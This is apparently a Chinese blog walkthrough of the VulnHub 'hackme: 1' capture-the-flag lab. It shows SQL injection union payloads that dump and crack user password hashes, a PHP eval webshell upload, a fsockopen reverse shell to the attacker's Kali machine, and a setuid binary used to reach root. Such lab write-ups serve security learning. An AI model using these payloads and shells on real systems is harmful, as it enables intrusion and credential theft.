目录
一、实验环境
1.1 攻击机Kali
(1)在虚拟机中安装Kali系统并作为攻击机,将网络连接设置成NAT模式
(2)Kali的IP地址为192.168.101.130
1.2 靶机下载
(1)下载地址: hackme: 1 ~ VulnHub
(2)通过上述简介可以知道,此靶机通过Web漏洞获得有限权限访问,并随后通过提权获得root权限。
(3)直接在VMware虚拟机中导入该靶机,将网络连接设置成NAT模式
(4)开启靶机
二、站点信息收集
2.1 IP扫描
使用命令arp-scan -l查找靶机的IP地址,发现靶机地址为192.168.101.139
arp-scan -l
2.2 端口扫描
(1)使用nmap工具对目标机进行端口扫描,发现打开了22端口,80端口
(2)访问80端口http://192.168.101.139,发现有一个登录页面,还可以进行注册
2.3 目录扫描
(1)使用dirsearch工具对网站目录进行扫描
dirsearch -u 192.168.101.139
(2)访问/uploads/目录,猜测应该是一个文件上传的目录
三、漏洞利用
3.1 SQL注入
(1)进入注册页面,注册一个新用户并登录
(2)登录后页面有一个搜索框,可以尝试SQL注入
(3)单击search可以看到很多书名
(4)通过验证可知存在字符型(单引号)SQL注入
OSINT' and 1=1#
OSINT' and 1=2#
(5)判断字段数
OSINT' order by 3#
OSINT' order by 4#
(6)确定回显点
-1' union select 1,2,3#
(7)查看版本号和数据库名
-1' union select version(),database(),3#
(8)查看表名,发现一个user表
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#
(9)查看user表的字段信息
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#
(10)查看用户名和密码,并进行MD5解密
-1' union select group_concat(user),group_concat(pasword),3 from users#
user | pasword | MD5解密 |
user1 | 5d41402abc4b2a76b9719d911017c592 | hello |
User2 | 6269c4f71a55b24bad0f0267d9be5508 | commando |
user3 | 0f359740bd1cda994f8b55330c86d845 | p@ssw0rd |
test | 05a671c66aefea124cc08b76ea6d30bb | testtest |
superadmin | 2386acb2cf356944177746fc92523983 | Uncrackable |
test1 | 05a671c66aefea124cc08b76ea6d30bb | testtest |
(11)发现有一个superadmin用户,猜测是管理员用户,登录一下,发现页面可以进行文件上传
3.2 文件上传
(1)新建一个info.php文件,上传该文件
<?php phpinfo();?>
(2)拼接上面目录扫描找到的路径进行访问,发现php文件可以成功上传
四、权限提升
4.1 蚁剑连接
(1)新建一个muma.php,上传一句话木马
<?php @eval($_POST['cmd']);?> //密码是cmd
(2)使用蚁剑进行连接,URL地址填写一句话木马的地址,密码是cmd,连接成功
4.2 nc反弹连接
(1)新建一个nc.php文件,编写nc反弹脚本并上传到网站
<?php
$sock=fsockopen("192.168.101.130",9999);//这里是kali的IP
exec("/bin/bash -i <&3 >&3 2>&3");
?>
(2)kali中开启监听
nc -lvvp 9999
(3)打开蚁剑中的虚拟终端,查看目录发现文件上传成功,执行nc.php文件
(4)kali监听成功
(5)显示系统用户,并筛选使用Bash作为默认shell的用户
cat /etc/passwd | grep /bin/bash
(6)转到/home/hackme目录下查看文件,发现有一个touchmenot文件
(7)执行该文件即可提权成功
./touchmenot
声明
1.本博客文章均为博主日常学习原创内容,转载请注明出处。
2.文章内容如有涉及侵犯您的知识产权和版权问题,请及时与我联系。
3.希望以上的学习经验分享能对您有所帮助。
4.本内容仅供学习和研究使用,严禁用于任何非法或不道德的行为,任何违反法律的行为将由行为人自行承担。